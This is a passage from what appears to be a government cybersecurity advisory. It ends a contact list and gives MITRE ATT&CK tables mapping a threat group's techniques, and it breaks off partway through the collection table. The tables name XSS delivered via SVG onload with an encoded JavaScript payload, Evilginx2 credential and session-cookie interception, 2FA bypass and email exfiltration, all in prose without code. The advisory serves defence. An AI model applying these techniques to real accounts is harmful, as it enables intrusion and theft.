<li>Security and Intelligence Service of the Republic of Moldova (SIS RM): <a href="mailto:cybersec@sis.md" target="_blank"><u>cybersec@sis.md</u></a> </li>
</ul>
</div>
<p><strong>Polish organizations </strong></p>
<ul>
<li>Polish Foreign Intelligence Agency (AW): <a href="mailto:ctiteam@aw.gov.pl" target="_blank"><u>ctiteam@aw.gov.pl</u></a></li>
</ul>
</div>
</div>
<h2><strong>Appendix A: MITRE ATT&amp;CK tactics and techniques</strong><a class="ck-anchor"></a></h2>
<p>See <a href="https://www.cisa.gov/#table9"><strong>Table 9</strong></a> through <a href="https://www.cisa.gov/#table19"><strong>Table 19</strong></a> for all the threat actor tactics and techniques referenced in this advisory.<a class="ck-anchor"></a></p>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 9: Reconnaissance </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Gather Victim Identity Information: Credentials </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1589/001/" target="_blank"><u>T1589.001</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The payload attempts to intercept a victim’s password from their password manager. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Gather Victim Identity Information: Email Addresses </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1589/002/" target="_blank"><u>T1589.002</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The payload attempts to grab the victim’s email address from various data stores. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Search Open Websites/Domains </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1593/" target="_blank"><u>T1593</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>This group likely leverages public information to support target development. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Active Scanning </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1595/" target="_blank"><u>T1595</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Port scanning can be used by this group to assist with determining exploitability of identified targets. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Search Open Technical Databases: Scan Databases </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1596/005/" target="_blank"><u>T1596.005</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Various public datasets can provide information to support discovery of exploitable targets. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Search Closed Sources </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1597/" target="_blank"><u>T1597</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Previously exfiltrated data can be used to enhance target development efforts. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Search Closed Sources: Purchase Technical Data </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1597/002/" target="_blank"><u>T1597.002</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Commercial datasets can also be used to support target development efforts. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<div class="WACAltTextDescribedBy SCXW76044448 BCX8"><a class="ck-anchor"></a></div>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 10: Resource Development </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Acquire Infrastructure </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1583/" target="_blank"><u>T1583</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>This group used Mullvad VPN to anonymize traffic sent to operational infrastructure. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Acquire Infrastructure: Virtual Private Server </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1583/003/" target="_blank"><u>T1583.003</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>This group procured VPS servers from a variety of vendors. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Develop Capabilities </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1587/" target="_blank"><u>T1587</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The <em>Ulej</em> capability was developed likely for use by this group to conduct spear phishing campaigns. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Develop Capabilities: Malware </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1587/001/" target="_blank"><u>T1587.001</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Development of a novel payload that steals a victim’s emails and other sensitive account information. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Develop Capabilities: Exploits </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1587/004/" target="_blank"><u>T1587.004</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Development of a novel, at the time, cross-site-scripting (XSS) exploit that enables execution of arbitrary JavaScript. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Obtain Capabilities: Tool </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1588/002/" target="_blank"><u>T1588.002</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Open source tools, such as Evilginx2, have also been used by the group. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Obtain Capabilities: Artificial Intelligence </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1588/007/" target="_blank"><u>T1588.007</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The group appears to have leveraged AI to support development efforts. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Stage Capabilities </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1608/" target="_blank"><u>T1608</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Flowerbed is deployed to a procured server in the cloud. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 11: Initial Access </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Valid Accounts </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1078/" target="_blank"><u>T1078</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>This actor has used commercial datasets to acquire account credentials and gain unauthorized access to accounts. Additionally, this actor is believed to use previously compromised accounts to conduct spear phishing.  </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Trusted Relationship </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1199/" target="_blank"><u>T1199</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The group sends malicious payloads to targeted individuals using previously compromised accounts that might have an established relationship with the target.  </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Phishing </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1566/" target="_blank"><u>T1566</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The actors used spear phishing to lure users into opening malicious email. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 12: Execution </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Exploitation for Client Execution </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1203/" target="_blank"><u>T1203</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>An XSS vulnerability was leveraged to execute the JavaScript payload. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 13: Persistence </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Account Manipulation </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1098/" target="_blank"><u>T1098</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Enabling IMAP and Application Passcodes provides persistent access to the compromised account. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Modify Authentication Process: Multi-Factor Authentication </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1556/006/" target="_blank"><u>T1556.006</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Creating Application Passcodes to bypass 2FA and stealing a user’s “Scratch Keys,” which can be used in place of a 2FA token. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 14: Privilege Escalation </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Valid Accounts </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1078/" target="_blank"><u>T1078</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>This actor has used commercial datasets to acquire account credentials and gain unauthorized privileged access to accounts.  </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p><a class="ck-anchor"></a></p>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 15: Stealth </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Obfuscated Files or Information: Command Obfuscation </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1027/010/" target="_blank"><u>T1027.010</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Obfuscated JavaScript payload sent to targets to exploit the XSS vulnerability. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Obfuscated Files or Information: Encrypted/Encoded File </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1027/013/" target="_blank"><u>T1027.013</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The JavaScript payload included both a Base64-encoded and XOR-encrypted inner payload. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Obfuscated Files or Information: SVG Smuggling </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1027/017/" target="_blank"><u>T1027.017</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The payload was contained in an “onload” attribute within an SVG image included in the malicious email. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Use Alternate Authentication Material: Web Session Cookie </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1550/004/" target="_blank"><u>T1550.004</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Previous campaigns using AiTM leveraged stealing and use of a victim’s session cookies to authenticate. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 16: Credential Access </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Modify Authentication Process: Multi-Factor Authentication </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1556/006/" target="_blank"><u>T1556.006</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Creating Application Passcodes to bypass 2FA and stealing a user’s “Scratch Keys,” which can be used in place of a 2FA token. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Adversary-in-the-Middle </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1557/" target="_blank"><u>T1557</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Previous campaigns used Evilginx2 as an AiTM toolkit to intercept credentials and session cookies. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p><a class="ck-anchor"></a></p>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 17: Collection </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Data Staged: Remote Data Staging </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1074/002/" target="_blank"><u>T1074.002</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Exfiltrated data was sent to an actor-controlled VPS prior to assumed long-term storage solutions. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Email Collection </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1114/" target="_blank"><u>T1114</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>This group has emphasized collection of emails. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Email Collection: Remote Email Collection </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1114/002/" target="_blank"><u>T1114.002</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
